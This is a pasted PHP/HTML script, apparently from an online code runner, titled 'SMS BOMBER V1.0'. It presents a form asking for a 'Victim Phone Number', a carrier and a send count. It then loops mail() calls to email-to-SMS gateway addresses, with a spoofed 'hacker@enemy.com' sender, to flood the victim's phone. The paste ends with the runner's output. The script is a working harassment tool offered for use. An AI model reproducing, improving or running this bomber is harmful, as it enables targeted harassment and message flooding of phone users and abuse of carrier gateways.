fork download
  1. <?<html>
  2. # php script created by KYXRECON
  3. <head>
  4. <meta http-equiv="author" content="SMS BOMBER V1.0"/>
  5. <title>
  6. 1njection- Sms Bomber
  7. </title>
  8. </head>
  9. <body background="https://4...content-available-to-author-only...t.com/-sCkHAIH_vHo/V4IrSeQzDxI/AAAAAAAAClg/R2-FiXjWVlMeV7qCujtPOh14QPmo_ZlAACLcB/s1600/Scree3nshot_4.jpg">
  10.  
  11. <form name="mailbomb" action="smsbomber.php" method="POST">
  12. <p><label for="oper"><b><font size="5" color=ff0909 >SMS BOMBER V1.0 BY KYXRECON :</b></font></label><br>
  13. <p><label for="oper"><b><font size="5" color=ffffff >Victim mobile operator :</b></font></label><br>
  14.  
  15. <select size="1" name="oper">
  16. <option value="@sms.xit.net">XIT Communications USA - Texas</option>
  17. </select>
  18. <p><label for="to"><font size="5" color=ff0909 >Victim Phone Number(without country code) :</font></label><br><input name="to" id="to" type="text" class="formbox" /><br></p>
  19. <p><label for="num"><font size="5" color=ffffff >How many times do you want us to send the sms ?</font></label><br><input name="num" id="num" type="text" class="formbox"/><br></p>
  20. <p><label for="message"><font size="5" color=ff0909 >Message(within 140 characters):</font></label><br><textarea name="message" id="message" cols="60" rows="8"></textarea></p>
  21. <p><input name="submit" id="submit" type="submit" value="Bomb!!" /></p></form>
  22. <?php
  23. //Sms bomber code created by 1njection-
  24. function airtelmail($to,$message,$oper,$num)
  25. {
  26. $operators=array($to.$oper,"919890".$to.$oper,"919810".$to.$oper,"919898".$to.$oper,"919896".$to.$oper,"919816 ".$to.$oper,"919893".$to.$oper,"919890".$to.$oper, "919892".$to.$oper,"919815".$to.$oper);
  27. $adhead="From: ".'Hacker'."<".'hacker@enemy.com'.">\r\n";
  28. for($i=0;$i<=8;$i++)
  29. {
  30. $to=$operators[$i];
  31. for($j=1;$j<=$num;$j++)
  32. {
  33. $sent=mail($to,$j,$message,$adhead);
  34. }
  35. }
  36. if($sent)
  37. {
  38. echo "<h1>Mail sent successfully!! $num times</h1>";
  39. }
  40. else
  41. {
  42. echo '<h1>Mail not sent!! Try again</h1>';
  43. }
  44. }
  45. function bplmobile($to,$message,$oper,$num)
  46. {
  47. $operators=array($to.$oper,"9823".$to.$oper,"9846".$to.$oper,"9821".$to.$oper,"9843".$to.$oper,"919843".$to.$oper);
  48. $adhead="From: ".'Hacker'."<".'hacker@enemy.com'.">\r\n";
  49. for($i=0;$i<=4;$i++)
  50. {
  51. $to=$operators[$i];
  52. for($j=1;$j<=$num;$j++)
  53. {
  54. $sent=mail($to,$j,$message,$adhead);
  55. }
  56. }
  57. if($sent)
  58. {
  59. echo "<h1>Mail sent successfully!! $num times</h1>";
  60. }
  61. else
  62. {
  63. echo '<h1>Mail not sent!! Try again</h1>';
  64. }
  65. }
  66. function escotelmobile($to,$message,$oper,$num)
  67. {
  68. $operators=array("9837".$to.$oper,"9812".$to.$oper ,"9847".$to.$oper);
  69. $adhead="From: ".'Hacker'."<".'hacker@enemy.com'.">\r\n";
  70. for($i=0;$i<=2;$i++)
  71. {
  72. $to=$operators[$i];
  73. for($j=1;$j<=$num;$j++)
  74. {
  75. $sent=mail($to,$j,$message,$adhead);
  76. }
  77. }
  78. if($sent)
  79. {
  80. echo "<h1>Mail sent successfully!! $num times</h1>";
  81. }
  82. else
  83. {
  84. echo '<h1>Mail not sent!! Try again</h1>';
  85. }
  86. }
  87. function normal($to,$message,$oper,$num)
  88. {
  89. $adhead="From: ".'Hacker'."<".'hacker@enemy.com'.">\r\n";
  90. for($i=1;$i<=$num;$i++)
  91. {
  92. $sent=mail($to,$i,$message,$adhead);
  93. }
  94. if($sent)
  95. {
  96. echo "<h1>Mail sent successfully!! $num times</h1>";
  97. }
  98. else
  99. {
  100. echo '<h1>Mail not sent!! Try again</h1>';
  101. }
  102. }
  103. if(isset($_POST['submit']) && isset($_POST['oper']) && isset($_POST['to']) && isset($_POST['message']))
  104. {
  105. $oper=$_POST['oper'];
  106. $to=$_POST['to'];
  107. $message=$_POST['message'];
  108. if($_POST['num']=="" || strlen($message)>140)
  109. {
  110. echo '<h1>Please fill in all valid details and then press Bomb!!</h1>';
  111. }
  112. else
  113. {
  114. $num=(int)$_POST['num'];
  115. if($oper=="@aircelap.com")
  116. {
  117. $to="91".$to.$oper;
  118. normal($to,$message,$oper,$num);
  119. }
  120. else if($oper=="@airtelchennai.com")
  121. {
  122. $to="919840".$to.$oper;
  123. normal($to,$message,$oper,$num);
  124. }
  125. else if($oper=="@rpgmail.net")
  126. {
  127. $to="9841".$to.$oper;
  128. normal($to,$message,$oper,$num);
  129. }
  130. else if($oper=="@delhi.hutch.co.in")
  131. {
  132. $to="9811".$to.$oper;
  133. normal($to,$message,$oper,$num);
  134. }
  135. else if($oper=="@smsmail.eplus.de" || $oper=="@movistar.net" || $oper=="@o2online.de" || $oper=="@sms.orange.nl" ||
  136. $oper=="@optusmobile.com.au" || $oper=="sms.tele2.se" || $oper=="@timnet.com" || $oper=="@vodafone-sms.de" || $oper=="@vodafone.es")
  137. {
  138. $to="0".$to.$oper;
  139. normal($to,$message,$oper,$num);
  140. }
  141. else if($oper=="@sms.globul.bg")
  142. {
  143. $to="35989".$to.$oper;
  144. normal($to,$message,$oper,$num);
  145. }
  146. else if($oper=="@celforce.com")
  147. {
  148. $to="9825".$to.$oper;
  149. normal($to,$message,$oper,$num);
  150. }
  151. else if($oper=="@airtelkk.com")
  152. {
  153. $to="919845".$to.$oper;
  154. normal($to,$message,$oper,$num);
  155. }
  156. else if($oper=="@airtelkerala.com")
  157. {
  158. $to="919895".$to.$oper;
  159. normal($to,$message,$oper,$num);
  160. }
  161. else if($oper=="@airtelkol.com")
  162. {
  163. $to="919831".$to.$oper;
  164. normal($to,$message,$oper,$num);
  165. }
  166. else if($oper=="@sms.ncell.com.np")
  167. {
  168. $to="977".$to.$oper;
  169. normal($to,$message,$oper,$num);
  170. }
  171. else if($oper=="@sms.mtel.net")
  172. {
  173. $to="35988".$to.$oper;
  174. normal($to,$message,$oper,$num);
  175. }
  176. else if($oper=="@nextel.net.ar")
  177. {
  178. $to="TwoWay.11".$to.$oper;
  179. normal($to,$message,$oper,$num);
  180. }
  181. else if($oper=="@text.plusgsm.pl")
  182. {
  183. $to="+".$to.$oper;
  184. normal($to,$message,$oper,$num);
  185. }
  186. else if($oper=="@gin.nl")
  187. {
  188. $to="31".$to.$oper;
  189. normal($to,$message,$oper,$num);
  190. }
  191. else if($oper=="@airtelmobile.com")
  192. {
  193. $to="919894".$to.$oper;
  194. normal($to,$message,$oper,$num);
  195. }
  196. else if($oper=="@airsms.com")
  197. {
  198. $to="9842".$to.$oper;
  199. normal($to,$message,$oper,$num);
  200. }
  201. else if($oper=="@sms.vivacom.bg")
  202. {
  203. $to="35987".$to.$oper;
  204. normal($to,$message,$oper,$num);
  205. }
  206. else if($oper=="@airtelmail.com")
  207. {
  208. airtelmail($to,$message,$oper);
  209. }
  210. else if($oper=="@bplmobile.com")
  211. {
  212. bplmobile($to,$message,$oper,$num);
  213. }
  214. else if($oper=="@escotelmobile.com")
  215. {
  216. escotelmobile($to,$message,$oper,$num);
  217. }
  218. else
  219. {
  220. $to=$to.$oper;
  221. normal($to,$message,$oper,$num);
  222. }
  223. }
  224. }
  225. else
  226. {
  227. echo '<h1>Please fill in all the details and then press Bomb!!And Fucked 1njection-:P is here</h1>';
  228. }
  229. ?>
  230. </body>
  231. </html>
Success #stdin #stdout 0.03s 26036KB
stdin
Standard input is empty
stdout
<?<html>
# php script created by KYXRECON
<head>
<meta http-equiv="author" content="SMS BOMBER V1.0"/>
<title>
1njection- Sms Bomber
</title>
</head>
<body background="https://4...content-available-to-author-only...t.com/-sCkHAIH_vHo/V4IrSeQzDxI/AAAAAAAAClg/R2-FiXjWVlMeV7qCujtPOh14QPmo_ZlAACLcB/s1600/Scree3nshot_4.jpg">

<form name="mailbomb" action="smsbomber.php" method="POST">
<p><label for="oper"><b><font size="5" color=ff0909  >SMS BOMBER V1.0 BY KYXRECON :</b></font></label><br>
<p><label for="oper"><b><font size="5" color=ffffff  >Victim mobile operator :</b></font></label><br>

<select size="1" name="oper">
<option value="@sms.xit.net">XIT Communications USA - Texas</option>
</select>
<p><label for="to"><font size="5" color=ff0909 >Victim Phone Number(without country code) :</font></label><br><input name="to" id="to" type="text" class="formbox" /><br></p>
<p><label for="num"><font size="5" color=ffffff >How many times do you want us to send the sms ?</font></label><br><input name="num" id="num" type="text" class="formbox"/><br></p>
<p><label for="message"><font size="5" color=ff0909 >Message(within 140 characters):</font></label><br><textarea name="message" id="message" cols="60" rows="8"></textarea></p>
<p><input name="submit" id="submit" type="submit" value="Bomb!!" /></p></form>
<h1>Please fill in all the details and then press Bomb!!And Fucked 1njection-:P is here</h1></body>
</html>